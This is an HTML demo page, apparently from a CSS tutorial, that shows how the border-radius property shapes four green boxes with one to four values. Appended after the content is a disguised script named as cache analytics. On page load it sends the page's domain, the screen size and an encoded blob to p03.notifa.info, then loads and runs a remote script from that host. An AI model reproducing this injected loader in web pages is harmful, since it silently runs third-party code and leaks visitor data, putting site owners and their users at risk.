<html><head>
<style> 
#rcorners1 {
  border-radius: 15px 50px 30px 5px;
  background: #73AD21;
  padding: 20px; 
  width: 200px;
  height: 150px; 
}

#rcorners2 {
  border-radius: 15px 50px 30px;
  background: #73AD21;
  padding: 20px; 
  width: 200px;
  height: 150px; 
}

#rcorners3 {
  border-radius: 15px 50px;
  background: #73AD21;
  padding: 20px; 
  width: 200px;
  height: 150px; 
} 

#rcorners4 {
  border-radius: 15px;
  background: #73AD21;
  padding: 20px; 
  width: 200px;
  height: 150px; 
} 
</style>
</head>
<body>

<h1>The border-radius Property</h1>

<p>Four values - border-radius: 15px 50px 30px 5px:</p>
<p id="rcorners1"></p>

<p>Three values - border-radius: 15px 50px 30px:</p>
<p id="rcorners2"></p>

<p>Two values - border-radius: 15px 50px:</p>
<p id="rcorners3"></p>

<p>One value - border-radius: 15px:</p>
<p id="rcorners4"></p>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXUOMYl3dEcejclt0snLgtQbihtnAp1Qhrrni0ZcS00XefSRgDYlSu%2f4H2h4wYhkR1TVCQJGQq%2fPmIJkzT1kR5PNtTUZipr1z%2bgvUlfQswm8lD0OHFuU%2fccLyOBUhQPh3XWslTZIi%2fv5uXln1K3qx7NGC5VugFFFXzdT8%2bAGX1pfqLfcQTqqwjRl%2blnK38kfINQuM8m2B0MRvUu3ovTN8JIStud1vc8AE4rV3YrXydWziVy6AIUdDSQAZD0OFPTNHfa11uq2hxLWw0bbTImz31cYQ2CLeMJktZDxp3ki091%2baWCYtuYF7SKoYWOQAaizj0n6zCuw4HYPIZB0l7bSg6mPl6EvOAEd8kJHt4mr%2bQ5jhIWeNep5qgvugtRBl%2b9cXSQgsokta5iVl7B6msl1IxUNadkUhsLGQkITCurRKa%2b9aHf7dvPIE9jd0kSoA%2f0E2wh2plvC6x9UGWQGE8hUKJxQoM5pNRvblHHZ9eUJDE5KGZKSO6D7LoA%2fEl4imu%2bdiJrl4r2vlE%2biE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

</body></html>  